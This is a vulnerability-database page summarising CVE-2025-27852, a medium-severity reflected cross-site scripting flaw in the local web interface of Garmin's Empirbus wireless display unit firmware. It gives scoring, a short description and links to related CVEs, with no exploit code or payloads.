QSearchQSearch

CVE-2025-27852

5.0 MEDIUM

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack

Published: 2026-05-13 · Last updated: 2026-06-02

Severity and scoring

CVSS
5.0 MEDIUM
Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE
CWE-79

Affected products

VendorProduct
garminempirbus_wireless_display_unit_firmware

Description

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page.

Source: NVD

References

Related CVEs

Same vendor

  • CVE-2025-27853 The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows its authentication to be bypassed (7.3 HIGH)
  • CVE-2025-27851 The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a cross-site origin WebSocket hijacking attack (9.3 CRITICAL)
  • CVE-2025-27850 The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a symlink attack (7.5 HIGH)

Same CWE

  • CVE-2026-9125 The Presto Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_url' parameter of the [presto_player_ov... (6.4 MEDIUM)
  • CVE-2026-42653 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iova.Mihai SliceWP allows Stored XSS (7.1 HIGH)
  • CVE-2026-46489 SolidInvoice is an open-source invoicing platform (8.1 HIGH)
  • CVE-2026-8589 GitLab has remediated an issue in GitLab EE affecting all versions from 13.1.4 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0... (7.3 HIGH)
  • CVE-2026-10087 GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2... (8.7 HIGH)